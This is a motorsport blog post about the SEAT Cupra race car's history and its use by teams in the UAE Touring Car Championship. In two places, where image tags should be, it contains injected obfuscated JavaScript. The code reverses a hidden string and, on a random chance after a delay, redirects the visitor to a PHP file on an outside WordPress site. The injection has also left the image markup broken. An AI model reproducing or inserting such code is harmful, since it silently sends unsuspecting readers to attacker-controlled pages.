Ultimately the best car to be in during the UAETCC Championship this year was the SEAT Cupra. I say the best but to qualify that would take a very long time. To give it a quick shot I would highlight the facts that it is a cost effective, super fast, affordable and super good looking machine!!
The car initially was built as the second generation SEAT Cupra for the SEAT Cupra Championship. The SEAT Cupra Championship was a one make series that ran for six years between 2003 and 2008, the last five of which ran as a support package to the British Touring Car Championship.
Sadly the series disbanded for 2009, due to SEAT UK ending its racing activities. This announcement was made with just one 2008 round left, leaving many drivers at a loose end and with large amounts of useless equipment – undoubtedly causing many to be unable to race at all in 2009.
The good news though was that more than one or two SEATS all of a sudden appeared on the used market…and then popping up in Dubai for the UAETCC.

As a good example check out how the SEAT is hustling the top running cars…A regular occurrence during the races.

Team House of Portier ran SEAT Cupra very successfully during the 2008/09 championship regularly challenging for race wins and destroying the rest of the cars in Class 3.
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/UATCCOct0822.jpg” alt=”www.crankandpiston.com” width=”728″ border=”0″>
There is no denying that it is a great looking purpose built race car. This particular example is the first of the two DXB cars.
$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/IMG_5050.jpg” alt=”www.crankandpiston.com” width=”728″ border=”0″>
DXB racing also stepped up and decided the SEAT was a great way to challenge the competition. This particular red car is the second of the two they own after the first car got caught up in a first corner nudge mid way through the season.
